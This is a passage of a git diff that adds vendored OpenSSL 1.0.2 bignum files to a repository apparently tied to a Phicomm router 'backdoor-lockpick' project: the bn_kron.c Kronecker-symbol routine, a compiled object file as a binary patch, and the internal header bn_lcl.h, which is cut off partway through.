zlpTJm;WTv$|FwpHR>SvexW2xQX*dmC>8X|H&*Jr4ui<*Xvou`qw^hSGrRl#<!}WgS
zT0W`UCyKW8&^*$gdKSxq!qt7!V@0^SH~L)>uI`8G%e)GuN8RhJD#F#h&TorwbstkB
z$tgYR-epk{uI@`V7UAl?WJ?jQ?n^5DBYCQOk$FY9y61ST2v_$U14X#H=cuI#$D{bG
zdydW`T-|d#U4*N9j)5Xv-E&0cm7>zG?m2vQ-7A+Q+Hj50o#^u3i&UwrV{uzuqGLtE
zSGS-o(dMhWtGnA**R_m3NZhP5)u*qnec6&F9ZMm)bXlUK4*y#FjJW%d-*+!f)^&C*
z>+I-CtVA19+_9*2VOQG{x?ubeo+xyXYslkjL1U9F-7o!KRY*5dpCZPR>6!|NSE#1V
z56=(f`Ga26Hb@{Ixr{|_LAab=QAa<Ui~3a+#r;o21?l{2+nZ=hIw#>ze^meSxLc@F
z{i}BqYN#yTzaTdt`L8P=ULjia&G1d_>x=L^DY?S)Y426|RsE{>&8Si3f)EO>Y_DTf
zE|zTrb^-p1`9C7tM^UFgYW@_q5(Uy(-2NxB{hf0CDEZ>{2~>>cKbgs1ivdZP{D<a3
zwO9T#THn;NGD^Qb-%sSarehu*iHh5g1y<}kfP5K)e(^uJqJc>|UL}4hXCAHn6QA=$
MQUyt`P~86i07lf)4FCWD

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_kron.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_kron.c
new file mode 100644
index 0000000..88d731a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_kron.c
@@ -0,0 +1,186 @@
+/* crypto/bn/bn_kron.c */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+/* least significant word */
+#define BN_lsw(n) (((n)->top == 0) ? (BN_ULONG) 0 : (n)->d[0])
+
+/* Returns -2 for errors because both -1 and 0 are valid results. */
+int BN_kronecker(const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx)
+{
+    int i;
+    int ret = -2;               /* avoid 'uninitialized' warning */
+    int err = 0;
+    BIGNUM *A, *B, *tmp;
+    /*-
+     * In 'tab', only odd-indexed entries are relevant:
+     * For any odd BIGNUM n,
+     *     tab[BN_lsw(n) & 7]
+     * is $(-1)^{(n^2-1)/8}$ (using TeX notation).
+     * Note that the sign of n does not matter.
+     */
+    static const int tab[8] = { 0, 1, 0, -1, 0, -1, 0, 1 };
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    BN_CTX_start(ctx);
+    A = BN_CTX_get(ctx);
+    B = BN_CTX_get(ctx);
+    if (B == NULL)
+        goto end;
+
+    err = !BN_copy(A, a);
+    if (err)
+        goto end;
+    err = !BN_copy(B, b);
+    if (err)
+        goto end;
+
+    /*
+     * Kronecker symbol, imlemented according to Henri Cohen,
+     * "A Course in Computational Algebraic Number Theory"
+     * (algorithm 1.4.10).
+     */
+
+    /* Cohen's step 1: */
+
+    if (BN_is_zero(B)) {
+        ret = BN_abs_is_word(A, 1);
+        goto end;
+    }
+
+    /* Cohen's step 2: */
+
+    if (!BN_is_odd(A) && !BN_is_odd(B)) {
+        ret = 0;
+        goto end;
+    }
+
+    /* now  B  is non-zero */
+    i = 0;
+    while (!BN_is_bit_set(B, i))
+        i++;
+    err = !BN_rshift(B, B, i);
+    if (err)
+        goto end;
+    if (i & 1) {
+        /* i is odd */
+        /* (thus  B  was even, thus  A  must be odd!)  */
+
+        /* set 'ret' to $(-1)^{(A^2-1)/8}$ */
+        ret = tab[BN_lsw(A) & 7];
+    } else {
+        /* i is even */
+        ret = 1;
+    }
+
+    if (B->neg) {
+        B->neg = 0;
+        if (A->neg)
+            ret = -ret;
+    }
+
+    /*
+     * now B is positive and odd, so what remains to be done is to compute
+     * the Jacobi symbol (A/B) and multiply it by 'ret'
+     */
+
+    while (1) {
+        /* Cohen's step 3: */
+
+        /*  B  is positive and odd */
+
+        if (BN_is_zero(A)) {
+            ret = BN_is_one(B) ? ret : 0;
+            goto end;
+        }
+
+        /* now  A  is non-zero */
+        i = 0;
+        while (!BN_is_bit_set(A, i))
+            i++;
+        err = !BN_rshift(A, A, i);
+        if (err)
+            goto end;
+        if (i & 1) {
+            /* i is odd */
+            /* multiply 'ret' by  $(-1)^{(B^2-1)/8}$ */
+            ret = ret * tab[BN_lsw(B) & 7];
+        }
+
+        /* Cohen's step 4: */
+        /* multiply 'ret' by  $(-1)^{(A-1)(B-1)/4}$ */
+        if ((A->neg ? ~BN_lsw(A) : BN_lsw(A)) & BN_lsw(B) & 2)
+            ret = -ret;
+
+        /* (A, B) := (B mod |A|, |A|) */
+        err = !BN_nnmod(B, B, A, ctx);
+        if (err)
+            goto end;
+        tmp = A;
+        A = B;
+        B = tmp;
+        tmp->neg = 0;
+    }
+ end:
+    BN_CTX_end(ctx);
+    if (err)
+        return -2;
+    else
+        return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_kron.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_kron.o
new file mode 100644
index 0000000000000000000000000000000000000000..9b9b31326e185e51705cd8e9359507c18531891d
GIT binary patch
literal 2824
zcmbuAO>7%Q6o6;F`EhBpHf<v!m4cxaN(EVLTByqbWgKs^L8cK+LaIWsoMhXC5IeHR
zQbN@b;TW+p0S<^W$BGNr9*ShCssiFb#Q`LKBUGRv1gJm+RiWm+*_nE>iiHGE8qIs(
zy!YnK&(6MVrFsLJMx<!u2~xKtCFHf%y57yzZeox&@_Xo>n{<Re)9-#phx^^XZTE9J
z)bIW=Joxl=bW6D#vbWtUT(!&9(BdVSB<22MyT97*<vM<k;~#AI+d6v(Sh6w|Ojewr
zRbDUNOG}$t(XcBPu}g6+wCI9^6<fDr*H-6IEnl18funyCt=I+;^WWJO9SrsbcqMUC
zFMGLKY^Jp<Yd<I5pKSM=Iu0$~4|(Xq_Zr1I3ELm5md*zWyMs?!A*Gd8d#N4Qm#iFo
zrF1S#Sa`W7jG%NL44rO#m0IfZ>>w!~D4h#xq4G$rR)bP_)#WF_fMtcDz|}bDR;-qE
zZ^4G}m3y@<V{JEWzE1*&7T<=nbm2#>G8km-v1<8K2CLO=UX>Mkf4t0Vs5}*9d+pMP
zwem;oE>X6<admAc*d4-#&^EiW$376a5b$btZ`i)QV4b#mec9q`v)!-Zv{n!CYS-6V
z=m)qv^wKQ=(vk-b%esjCR5E0(JbOCnuF&V`Y5F`(U&d`w1(TqFcTMd%@9XJ#JkmKl
zTFkOy<d}KbjCRG27P%Rle<W%~j~wzaPeGcX!&;l6^&KB30Ya+CbZ97hy^d%vogmt5
zSlhR&HTV`xlmdRY7&`(%q}K?)8Auo%Z|Ig0S!%M4&exlhM)cJdYQ#&e)ace*14i63
zqSWXF5AaMF;e-(sIU04irY3TOuhZ|NZ~Nt8?Xvo<5jtP(R<;vNjj!J05oK6cxPl?O
z@^LEzI@x|TI@zIk)m5Fe)D5BGe(zS+#rGE2ebD%w5`MBf+JGk;@PP(=qycvt@LU5v
z+klhNY<eo6%bH_^Wk$_MV}~CjiQ^nOV^dC^r2A3>37Sd|^!5%~L+K%!NLgug=@~ki
zF0f3VN#m@;)v?^n9HPlWdUTSd3m(lECMM7D@oaWFH!fqG>^Kw#BJV8T@iu6i_z{5|
z#6b|`1~kbZMhN2Py&mQ~1iJJ;)qr1AIG&^Q|3u+;DtuFL{Iu|vNdNu(BPaNsZs9|M
zW1VXLDTS-~zf|~cC4W062Ejagpvie7prhchaN#yF3v<(OqR_Lv*H1_-@4T2XnKR3X
zIi6t|VvZIH#LVYBV=Om4?POsrn`4d%Z%-GT^4OHH&t{9}Og=Z`<k=j=U?yiGeI}oo
z#vA$nB?2jM3;bVTH!u|W-FcShD|PJmLBl=jhNemtA5xIG*kA8`A-7+K4sVz|06n_+
zUn;g`bA_|;ty_dV1O~n~|1~})a{8xR5Fi5Mszg)+^kdMl{-}??E8-vYaj_k@U$%sZ
z_qmae{RIgJ887`$fP$~E-~Flp5$Py;|I7RWaLnnC|4o32e~HIixZU~xB`%aaXFPv=
z{pI|UZ#Oqic~TtcidgV2V3@-nk2(Ek4~WFY{VSoNh=2d^E!ZwTEPicFiAB{P{|||F
B)nfnv

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lcl.h
new file mode 100644
index 0000000..7cd5883
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lcl.h
@@ -0,0 +1,537 @@
+/* crypto/bn/bn_lcl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_BN_LCL_H
+# define HEADER_BN_LCL_H
+
+# include <openssl/bn.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*-
+ * BN_window_bits_for_exponent_size -- macro for sliding window mod_exp functions
+ *
+ *
+ * For window size 'w' (w >= 2) and a random 'b' bits exponent,
+ * the number of multiplications is a constant plus on average
+ *
+ *    2^(w-1) + (b-w)/(w+1);
+ *
+ * here  2^(w-1)  is for precomputing the table (we actually need
+ * entries only for windows that have the lowest bit set), and
+ * (b-w)/(w+1)  is an approximation for the expected number of
+ * w-bit windows, not counting the first one.
+ *
+ * Thus we should use
+ *
+ *    w >= 6  if        b > 671
+ *     w = 5  if  671 > b > 239
+ *     w = 4  if  239 > b >  79
+ *     w = 3  if   79 > b >  23
+ *    w <= 2  if   23 > b
+ *
+ * (with draws in between).  Very small exponents are often selected
+ * with low Hamming weight, so we use  w = 1  for b <= 23.
+ */
+# if 1
+#  define BN_window_bits_for_exponent_size(b) \
+                ((b) > 671 ? 6 : \
+                 (b) > 239 ? 5 : \
+                 (b) >  79 ? 4 : \
+                 (b) >  23 ? 3 : 1)
+# else
+/*
+ * Old SSLeay/OpenSSL table. Maximum window size was 5, so this table differs
+ * for b==1024; but it coincides for other interesting values (b==160,
+ * b==512).
+ */
+#  define BN_window_bits_for_exponent_size(b) \
+                ((b) > 255 ? 5 : \
+                 (b) > 127 ? 4 : \
+                 (b) >  17 ? 3 : 1)
+# endif
+
+/*
+ * BN_mod_exp_mont_conttime is based on the assumption that the L1 data cache
+ * line width of the target processor is at least the following value.
+ */
+# define MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH      ( 64 )
+# define MOD_EXP_CTIME_MIN_CACHE_LINE_MASK       (MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH - 1)
+
+/*
+ * Window sizes optimized for fixed window size modular exponentiation
+ * algorithm (BN_mod_exp_mont_consttime). To achieve the security goals of
+ * BN_mode_exp_mont_consttime, the maximum size of the window must not exceed
+ * log_2(MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH). Window size thresholds are
+ * defined for cache line sizes of 32 and 64, cache line sizes where
+ * log_2(32)=5 and log_2(64)=6 respectively. A window size of 7 should only be
+ * used on processors that have a 128 byte or greater cache line size.
+ */
+# if MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH == 64
+
+#  define BN_window_bits_for_ctime_exponent_size(b) \
+                ((b) > 937 ? 6 : \
+                 (b) > 306 ? 5 : \
+                 (b) >  89 ? 4 : \
+                 (b) >  22 ? 3 : 1)
+#  define BN_MAX_WINDOW_BITS_FOR_CTIME_EXPONENT_SIZE    (6)
+
+# elif MOD_EXP_CTIME_MIN_CACHE_LINE_WIDTH == 32
+
+#  define BN_window_bits_for_ctime_exponent_size(b) \
+                ((b) > 306 ? 5 : \
+                 (b) >  89 ? 4 : \
+                 (b) >  22 ? 3 : 1)
+#  define BN_MAX_WINDOW_BITS_FOR_CTIME_EXPONENT_SIZE    (5)
+
+# endif
+
+/* Pentium pro 16,16,16,32,64 */
+/* Alpha       16,16,16,16.64 */
+# define BN_MULL_SIZE_NORMAL                     (16)/* 32 */
+# define BN_MUL_RECURSIVE_SIZE_NORMAL            (16)/* 32 less than */
+# define BN_SQR_RECURSIVE_SIZE_NORMAL            (16)/* 32 */
+# define BN_MUL_LOW_RECURSIVE_SIZE_NORMAL        (32)/* 32 */
+# define BN_MONT_CTX_SET_SIZE_WORD               (64)/* 32 */
+
+/*
+ * 2011-02-22 SMS. In various places, a size_t variable or a type cast to
+ * size_t was used to perform integer-only operations on pointers.  This
+ * failed on VMS with 64-bit pointers (CC /POINTER_SIZE = 64) because size_t
+ * is still only 32 bits.  What's needed in these cases is an integer type
+ * with the same size as a pointer, which size_t is not certain to be. The
+ * only fix here is VMS-specific.
+ */
+# if defined(OPENSSL_SYS_VMS)
+#  if __INITIAL_POINTER_SIZE == 64
+#   define PTR_SIZE_INT long long
+#  else                         /* __INITIAL_POINTER_SIZE == 64 */
+#   define PTR_SIZE_INT int
+#  endif                        /* __INITIAL_POINTER_SIZE == 64 [else] */
+# elif !defined(PTR_SIZE_INT)   /* defined(OPENSSL_SYS_VMS) */
+#  define PTR_SIZE_INT size_t
+# endif                         /* defined(OPENSSL_SYS_VMS) [else] */
+
+# if !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM) && !defined(PEDANTIC)
+/*
+ * BN_UMULT_HIGH section.
+ *
+ * No, I'm not trying to overwhelm you when stating that the
+ * product of N-bit numbers is 2*N bits wide:-) No, I don't expect
+ * you to be impressed when I say that if the compiler doesn't
+ * support 2*N integer type, then you have to replace every N*N
+ * multiplication with 4 (N/2)*(N/2) accompanied by some shifts
+ * and additions which unavoidably results in severe performance
+ * penalties. Of course provided that the hardware is capable of
+ * producing 2*N result... That's when you normally start
+ * considering assembler implementation. However! It should be
+ * pointed out that some CPUs (most notably Alpha, PowerPC and
+ * upcoming IA-64 family:-) provide *separate* instruction
+ * calculating the upper half of the product placing the result
+ * into a general purpose register. Now *if* the compiler supports
+ * inline assembler, then it's not impossible to implement the
+ * "bignum" routines (and have the compiler optimize 'em)
+ * exhibiting "native" performance in C. That's what BN_UMULT_HIGH
+ * macro is about:-)
+ *
+ *                                      <appro@fy.chalmers.se>
+ */
+#  if defined(__alpha) && (defined(SIXTY_FOUR_BIT_LONG) || defined(SIXTY_FOUR_BIT))
+#   if defined(__DECC)
+#    include <c_asm.h>
+#    define BN_UMULT_HIGH(a,b)   (BN_ULONG)asm("umulh %a0,%a1,%v0",(a),(b))
+#   elif defined(__GNUC__) && __GNUC__>=2
+#    define BN_UMULT_HIGH(a,b)   ({      \
+        register BN_ULONG ret;          \
+        asm ("umulh     %1,%2,%0"       \
+             : "=r"(ret)                \
+             : "r"(a), "r"(b));         \
+        ret;                    })
+#   endif                       /* compiler */
+#  elif defined(_ARCH_PPC) && defined(__64BIT__) && defined(SIXTY_FOUR_BIT_LONG)
+#   if defined(__GNUC__) && __GNUC__>=2
+#    define BN_UMULT_HIGH(a,b)   ({      \
+        register BN_ULONG ret;          \
+        asm ("mulhdu    %0,%1,%2"       \
+             : "=r"(ret)                \
+             : "r"(a), "r"(b));         \
+        ret;                    })
+#   endif                       /* compiler */
+#  elif (defined(__x86_64) || defined(__x86_64__)) && \
+       (defined(SIXTY_FOUR_BIT_LONG) || defined(SIXTY_FOUR_BIT))
+#   if defined(__GNUC__) && __GNUC__>=2
+#    define BN_UMULT_HIGH(a,b)   ({      \
+        register BN_ULONG ret,discard;  \
+        asm ("mulq      %3"             \
+             : "=a"(discard),"=d"(ret)  \
+             : "a"(a), "g"(b)           \
+             : "cc");                   \
+        ret;                    })
+#    define BN_UMULT_LOHI(low,high,a,b)  \
+        asm ("mulq      %3"             \
+                : "=a"(low),"=d"(high)  \
+                : "a"(a),"g"(b)         \
+                : "cc");
+#   endif
+#  elif (defined(_M_AMD64) || defined(_M_X64)) && defined(SIXTY_FOUR_BIT)
+#   if defined(_MSC_VER) && _MSC_VER>=1400
+unsigned __int64 __umulh(unsigned __int64 a, unsigned __int64 b);
+unsigned __int64 _umul128(unsigned __int64 a, unsigned __int64 b,
+                          unsigned __int64 *h);
+#    pragma intrinsic(__umulh,_umul128)
+#    define BN_UMULT_HIGH(a,b)           __umulh((a),(b))
+#    define BN_UMULT_LOHI(low,high,a,b)  ((low)=_umul128((a),(b),&(high)))
+#   endif
+#  elif defined(__mips) && (defined(SIXTY_FOUR_BIT) || defined(SIXTY_FOUR_BIT_LONG))
+#   if defined(__GNUC__) && __GNUC__>=2
+#    if __GNUC__>=4 && __GNUC_MINOR__>=4
+                                     /* "h" constraint is no more since 4.4 */
+#     define BN_UMULT_HIGH(a,b)          (((__uint128_t)(a)*(b))>>64)
+#     define BN_UMULT_LOHI(low,high,a,b) ({     \
+        __uint128_t ret=(__uint128_t)(a)*(b);   \
+        (high)=ret>>64; (low)=ret;       })
+#    else
+#     define BN_UMULT_HIGH(a,b) ({      \
+        register BN_ULONG ret;          \
+        asm ("dmultu    %1,%2"          \
+             : "=h"(ret)                \
+             : "r"(a), "r"(b) : "l");   \
+        ret;                    })
+#     define BN_UMULT_LOHI(low,high,a,b)\
+        asm ("dmultu    %2,%3"          \
+             : "=l"(low),"=h"(high)     \
+             : "r"(a), "r"(b));
+#    endif
+#   endif
+#  elif defined(__aarch64__) && defined(SIXTY_FOUR_BIT_LONG)
+#   if defined(__GNUC__) && __GNUC__>=2
+#    define BN_UMULT_HIGH(a,b)   ({      \
+        register BN_ULONG ret;          \
+        asm ("umulh     %0,%1,%2"       \
+             : "=r"(ret)                \
+             : "r"(a), "r"(b));         \
+        ret;                    })
+#   endif
+#  endif                        /* cpu */
+# endif                         /* OPENSSL_NO_ASM */
+
+/*************************************************************
+ * Using the long long type
+ */
+# define Lw(t)    (((BN_ULONG)(t))&BN_MASK2)
+# define Hw(t)    (((BN_ULONG)((t)>>BN_BITS2))&BN_MASK2)
+
+# ifdef BN_DEBUG_RAND
+#  define bn_clear_top2max(a) \
+        { \
+        int      ind = (a)->dmax - (a)->top; \
+        BN_ULONG *ftl = &(a)->d[(a)->top-1]; \
+        for (; ind != 0; ind--) \
+                *(++ftl) = 0x0; \
+        }
+# else
+#  define bn_clear_top2max(a)
+# endif
+
+# ifdef BN_LLONG
+#  define mul_add(r,a,w,c) { \
+        BN_ULLONG t; \
+        t=(BN_ULLONG)w * (a) + (r) + (c); \
+        (r)= Lw(t); \
+        (c)= Hw(t); \
+        }
+
+#  define mul(r,a,w,c) { \
+        BN_ULLONG t; \
+        t=(BN_ULLONG)w * (a) + (c); \
+        (r)= Lw(t); \
+        (c)= Hw(t); \
+        }
+
+#  define sqr(r0,r1,a) { \
+        BN_ULLONG t; \
+        t=(BN_ULLONG)(a)*(a); \
+        (r0)=Lw(t); \
+        (r1)=Hw(t); \
+        }
+
+# elif defined(BN_UMULT_LOHI)
+#  define mul_add(r,a,w,c) {              \
+        BN_ULONG high,low,ret,tmp=(a);  \
+        ret =  (r);                     \
+        BN_UMULT_LOHI(low,high,w,tmp);  \
+        ret += (c);                     \
+        (c) =  (ret<(c))?1:0;           \
+        (c) += high;                    \
+        ret += low;                     \
+        (c) += (ret<low)?1:0;           \
+        (r) =  ret;                     \
+        }
+
+#  define mul(r,a,w,c)    {               \
+        BN_ULONG high,low,ret,ta=(a);   \
+        BN_UMULT_LOHI(low,high,w,ta);   \
+        ret =  low + (c);               \
+        (c) =  high;                    \
+        (c) += (ret<low)?1:0;           \
+        (r) =  ret;                     \
+        }
+
+#  define sqr(r0,r1,a)    {               \
+        BN_ULONG tmp=(a);               \
+        BN_UMULT_LOHI(r0,r1,tmp,tmp);   \
+        }
+
+# elif defined(BN_UMULT_HIGH)
+#  define mul_add(r,a,w,c) {              \
+        BN_ULONG high,low,ret,tmp=(a);  \
+        ret =  (r);                     \
+        high=  BN_UMULT_HIGH(w,tmp);    \
+        ret += (c);                     \
+        low =  (w) * tmp;               \
+        (c) =  (ret<(c))?1:0;           \
+        (c) += high;                    \
+        ret += low;                     \
+        (c) += (ret<low)?1:0;           \
+        (r) =  ret;                     \
+        }
+
+#  define mul(r,a,w,c)    {               \
+        BN_ULONG high,low,ret,ta=(a);   \
+        low =  (w) * ta;                \
+        high=  BN_UMULT_HIGH(w,ta);     \
+        ret =  low + (c);               \
+        (c) =  high;                    \
+        (c) += (ret<low)?1:0;           \
+        (r) =  ret;                     \
+        }
+
+#  define sqr(r0,r1,a)    {               \
+        BN_ULONG tmp=(a);               \
+        (r0) = tmp * tmp;               \
+        (r1) = BN_UMULT_HIGH(tmp,tmp);  \
+        }
+
+# else
+/*************************************************************
+ * No long long type
+ */
+
+#  define LBITS(a)        ((a)&BN_MASK2l)
+#  define HBITS(a)        (((a)>>BN_BITS4)&BN_MASK2l)
+#  define L2HBITS(a)      (((a)<<BN_BITS4)&BN_MASK2)
+
+#  define LLBITS(a)       ((a)&BN_MASKl)
+#  define LHBITS(a)       (((a)>>BN_BITS2)&BN_MASKl)
+#  define LL2HBITS(a)     ((BN_ULLONG)((a)&BN_MASKl)<<BN_BITS2)
+
+#  define mul64(l,h,bl,bh) \
+        { \
+        BN_ULONG m,m1,lt,ht; \
+ \
+        lt=l; \
+        ht=h; \
+        m =(bh)*(lt); \
+        lt=(bl)*(lt); \
+        m1=(bl)*(ht); \
+        ht =(bh)*(ht); \
+        m=(m+m1)&BN_MASK2; if (m < m1) ht+=L2HBITS((BN_ULONG)1); \
+        ht+=HBITS(m); \
+        m1=L2HBITS(m); \
+        lt=(lt+m1)&BN_MASK2; if (lt < m1) ht++; \
+        (l)=lt; \
+        (h)=ht; \
+        }
+
+#  define sqr64(lo,ho,in) \
+        { \
+        BN_ULONG l,h,m; \
+ \
+        h=(in); \
+        l=LBITS(h); \
+        h=HBITS(h); \
+        m =(l)*(h); \
+        l*=l; \
+        h*=h; \
+        h+=(m&BN_MASK2h1)>>(BN_BITS4-1); \
+        m =(m&BN_MASK2l)<<(BN_BITS4+1); \
